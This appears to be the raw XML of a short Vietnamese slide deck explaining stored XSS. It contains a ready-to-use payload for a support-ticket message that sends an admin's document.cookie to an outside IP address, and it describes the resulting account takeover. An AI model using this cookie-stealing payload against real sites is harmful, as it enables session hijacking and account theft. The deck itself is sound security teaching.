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A4DB86-5688-4B8E-8B22-5BE4B176B44D}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/26/2021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349770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4DB86-5688-4B8E-8B22-5BE4B176B44D}"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92952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4DB86-5688-4B8E-8B22-5BE4B176B44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2263385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4DB86-5688-4B8E-8B22-5BE4B176B44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178417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4DB86-5688-4B8E-8B22-5BE4B176B44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3784328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4DB86-5688-4B8E-8B22-5BE4B176B44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3319909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4DB86-5688-4B8E-8B22-5BE4B176B44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2513070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4DB86-5688-4B8E-8B22-5BE4B176B44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163728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4DB86-5688-4B8E-8B22-5BE4B176B44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151535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4DB86-5688-4B8E-8B22-5BE4B176B44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95027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4DB86-5688-4B8E-8B22-5BE4B176B44D}"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235377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A4DB86-5688-4B8E-8B22-5BE4B176B44D}"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59277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A4DB86-5688-4B8E-8B22-5BE4B176B44D}"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170537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A4DB86-5688-4B8E-8B22-5BE4B176B44D}"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86524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4DB86-5688-4B8E-8B22-5BE4B176B44D}"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197095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4DB86-5688-4B8E-8B22-5BE4B176B44D}"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85539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4DB86-5688-4B8E-8B22-5BE4B176B44D}"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E7DEA-2F9F-46E5-AC82-BA1A783395A8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="301601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A4DB86-5688-4B8E-8B22-5BE4B176B44D}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/26/2021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8E7DEA-2F9F-46E5-AC82-BA1A783395A8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2653273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EB8C-792B-4636-9558-E3067161934A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>STORED XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61DF4A4A-BDB5-4712-87CE-F7992653E7B9}"/>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291545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FE64-5C90-4D35-B16F-249CEC34CF7D}"/>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4E495ADE-5FDC-4014-8525-7919CD9E8C0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:effectLst/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Stored xss phát sinh khi quá trình kiểm tra đầu vào không chặt chẽ khiến cho attacker có thể lợi dụng và gửi các yêu cầu độc hại lên phía database và lưu ở đó . Khi nạn nhân truy cập vào hệ thống sẽ lấy tất cả các dữ liệu lưu trữ kể cả mã độc hại in ra màn hình ngay sau khi load thành công trang mã sẽ được thực thi gây hại đến người dùng .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="305934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570F-0066-49F4-9C76-EA221718CBDB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Khai thác </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15E68925-EB06-4BDF-BBBB-B9DB0C5AC386}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Tạo một tiket , và truyền vào phần message payload : &lt;script&gt;new Image().src="http://193.112.33.32/?cookie=" + document.cookie;&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Tiket sẽ được lưu trữ trong cơ sở dữ liệu và khi được truy cập bởi admin, nó sẽ ngầm gửi cookie của admin tới trang web attacker đang kiểm soát.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Từ đó kẻ tấn công sẽ có được cookie người dung và có quyền truy cập vào tài khoản của họ.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1036178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29</TotalTime>
  <Words>175</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Corbel</vt:lpstr>
      <vt:lpstr>Parallax</vt:lpstr>
      <vt:lpstr>STORED XSS</vt:lpstr>
      <vt:lpstr>Tổng quan</vt:lpstr>
      <vt:lpstr>Khai thác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XSS</dc:title>
  <dc:creator>Pham Duy Chien (FIS CSD HN)</dc:creator>
  <cp:lastModifiedBy>Pham Duy Chien (FIS CSD HN)</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-11-26T13:18:28Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-11-26T13:48:09Z</dcterms:modified>
</cp:coreProperties>
</file>